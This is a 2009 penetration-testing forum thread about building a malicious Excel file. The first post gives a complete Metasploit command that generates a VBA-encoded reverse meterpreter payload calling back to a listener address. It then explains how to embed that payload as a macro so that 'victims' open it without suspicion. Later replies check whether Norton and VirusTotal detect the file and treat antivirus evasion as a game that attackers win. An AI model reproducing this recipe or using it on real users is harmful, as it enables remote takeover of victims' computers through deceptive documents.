Alternate filetype for SE to get reverse meterpreter session

**kazalku** · 07-18-2009, 11:41 PM

Someone here was looking for non-exe type file (jpg?) so that the victim is less suspicious while running them. Well, an excel file may be the solution.

I used:
1. BT3 with msf v3.3
2. M$ office 2002 SP3 in a vista box

First, I generated a VBA code in a konsole in BT3 box:

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=7777 R | ./msfencode -b '' -t vba >> /root/Desktop/meterpreter.cls

I transferred the file to Windows, then, created an excel document, AND Tools>Macro>Visual Basic Editor. From the File>Import File>Browsed to the .cls file.

Job done!

PS: Virustotal scans the excel file as clean. Can somebody check with Norton AV please...

**aspekt9** · 07-22-2009, 04:43 PM

This is also doable with PDF files, I remember reading an article on securinfos.infos a while back about how to do it.

**kazalku** · 07-22-2009, 08:56 PM

I agree, however the pdf file is caught by around 10 or so number of AV if tested in Virustotal.

**imported_L3g10n** · 08-01-2009, 10:45 AM

Hey,
So i created the file and scanned it using Norton AV 2008 running version 15.5.0.23 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps...

**Archangel-Amael** · 08-01-2009, 11:45 AM

Some good reading in relation to this thread.
I have since tried it out and well as the study shows it will be picked up.
hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python

**kazalku** · 08-02-2009, 12:08 AM

Originally Posted by L3g10n

Hey,
So i created the file and scanned it using Norton AV 2008 running version 15.5.0.23 fully patched.(This is one of the newest versions). No threat was detected :P!! Hope this helps...

Thanks..

Originally Posted by archangel.amael

Some good reading in relation to this thread.
I have since tried it out and well as the study shows it will be picked up.
hype-free: Detecting the Metasploit encryptors in one hour and 49 lines of Python

I like the comment at the end:

We have to keep those AV guys employed somehow - basic idea is change the loader every few months once their detection catches up. It doesn't have to be good, just different.

**Archangel-Amael** · 08-02-2009, 10:27 AM

Originally Posted by kazalku

I like the comment at the end:

Well it is a "cat and mouse" game after all. Or some would say.

**imported_L3g10n** · 08-02-2009, 10:44 AM

I think their both the cat and the mouse.... :P AV companies that is.... hehe

**kazalku** · 08-02-2009, 11:28 PM

Originally Posted by archangel.amael

Well it is a "cat and mouse" game after all. Or some would say.

And as usual, "mouse" is ALWAYS the winner, no matter how strong the "cat" is, the little one always find a way to get the "cheese"...

BackTrack Linux - Penetration Testing Distribution

Thread: Alternate filetype for SE to get reverse meterpreter session

Thread Tools

Search Thread

Display

Alternate filetype for SE to get reverse meterpreter session

Scanned with Norton AV 2008

Posting Permissions